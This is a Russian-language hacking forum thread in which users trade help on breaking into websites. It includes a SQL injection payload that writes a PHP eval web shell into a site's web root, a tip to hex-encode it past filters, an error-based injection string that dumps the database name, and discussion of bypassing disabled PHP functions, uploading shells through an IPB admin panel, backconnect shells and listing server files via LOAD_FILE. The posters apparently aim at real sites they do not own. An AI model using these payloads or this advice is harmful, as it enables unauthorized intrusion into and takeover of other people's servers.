Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. opahopa

    opahopa New Member

    Joined:
    30 Nov 2010
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    basket.js Это видимо просто скрипт корзины совпадающий с таким на других сайтах. получается тогда на безе CMS OXID e-shop согласно скрипту, но вероятность верного определения насколько велика?
     
  2. sysjuk

    sysjuk Member

    Joined:
    5 Jan 2012
    Messages:
    226
    Likes Received:
    46
    Reputations:
    3
    Назрел тут вопрос по sql injection, ns clounfire, пытаюсь выполнить такой запрос но безрезультатно.
    https://site.net/index.php'+and+(SeLeCt '<?php eval(base64_decode($_REQUEST[cmd])); ?>' InTo OuTfIlE '/home/site/public_html/site.net/tester.php')
    Не дает выполнить из-за <? если пишу select тоже не выполнятся, написал SeLeCt выполнился, но шелл не заливается, полный путь указан верно. Есть какие мысли?
     
  3. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    886
    Reputations:
    363
    попробуйте всю строку с php кодом в hex
     
    _________________________
  4. sysjuk

    sysjuk Member

    Joined:
    5 Jan 2012
    Messages:
    226
    Likes Received:
    46
    Reputations:
    3
    Disabled PHP Functions: exec,ini_get_all,parse_ini_file,passthru,php_uname,popen,proc_open,shell_exec,show_source,system
    как нибудь можно обойти эти ограничения?
     
  5. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    886
    Reputations:
    363
    смотря, что вам нужно
     
    _________________________
  6. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    980
    Likes Received:
    523
    Reputations:
    173
    Если экранируется <? то нихера не выйдет
     
  7. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    886
    Reputations:
    363
    почему?
     
    _________________________
  8. 5maks5

    5maks5 Elder - Старейшина

    Joined:
    29 Aug 2010
    Messages:
    465
    Likes Received:
    264
    Reputations:
    40
    Банально - запилить бэкконект. :eek:
     
  9. sysjuk

    sysjuk Member

    Joined:
    5 Jan 2012
    Messages:
    226
    Likes Received:
    46
    Reputations:
    3
    бэкконект не работает в этом все и дело.
     
  10. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    291
    Likes Received:
    55
    Reputations:
    20
    Не могу залиться в IPB 1.3. Доступ админа есть.
    Пробовал через смайлы - не получилось.
    Пробовал sql запросом - нет прав на запись.

    Какие еще способы есть ?
     
  11. teh

    teh Member

    Joined:
    2 Dec 2010
    Messages:
    79
    Likes Received:
    6
    Reputations:
    -2
    Не могу разобраться с sql инъекцией. Когда использую order byб подобралб все хорошо, страница отображается. Когда начинаю использовать union select то страница не отображается. Пробивал /*!union*/ не помогает, может подскажите что делать, пожалуйста?
     
  12. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    291
    Likes Received:
    55
    Reputations:
    20
    попробуй так
    Code:
    ' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(database() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
     
  13. teh

    teh Member

    Joined:
    2 Dec 2010
    Messages:
    79
    Likes Received:
    6
    Reputations:
    -2
    спасибо, но так тоже не работает
     
  14. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    423
    Likes Received:
    165
    Reputations:
    126
    Попробуй сделать запрос без union либо без select , если отобразится страница, то пробуй обойти фильтр.
     
    _________________________
  15. teh

    teh Member

    Joined:
    2 Dec 2010
    Messages:
    79
    Likes Received:
    6
    Reputations:
    -2
    ага, понял. Буду пробовать, спасибо
     
  16. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    886
    Reputations:
    363
    возможно, что там два последовательных запроса. возможно, что это не mysql
     
    _________________________
  17. sysjuk

    sysjuk Member

    Joined:
    5 Jan 2012
    Messages:
    226
    Likes Received:
    46
    Reputations:
    3
    Есть вопрос, возможно ли через MySql LOAD FILE посмотреть список файлов в директории?
     
  18. gromoza

    gromoza Member

    Joined:
    21 Dec 2008
    Messages:
    7
    Likes Received:
    6
    Reputations:
    0
    Если ОС сервера FreeBSD.
     
  19. teh

    teh Member

    Joined:
    2 Dec 2010
    Messages:
    79
    Likes Received:
    6
    Reputations:
    -2
    думаю если есть права на LOAD_FILE, залей шелл, дальше по анологии
     
  20. sysjuk

    sysjuk Member

    Joined:
    5 Jan 2012
    Messages:
    226
    Likes Received:
    46
    Reputations:
    3
    Беда, с Linux 2.6.32-042stab094.8 #1 SMP Tue Dec 16 20:36:56 MSK 2014 i686 мб еще какие нибудь варианты есть? Файлы то читаются нормально, но нужно знать полный список файлов в каталоге.
    Шелл залит, но права нищенские все функции в Disabled.
    бэкконект не катит тоже.
     
Loading...
Thread Status:
Not open for further replies.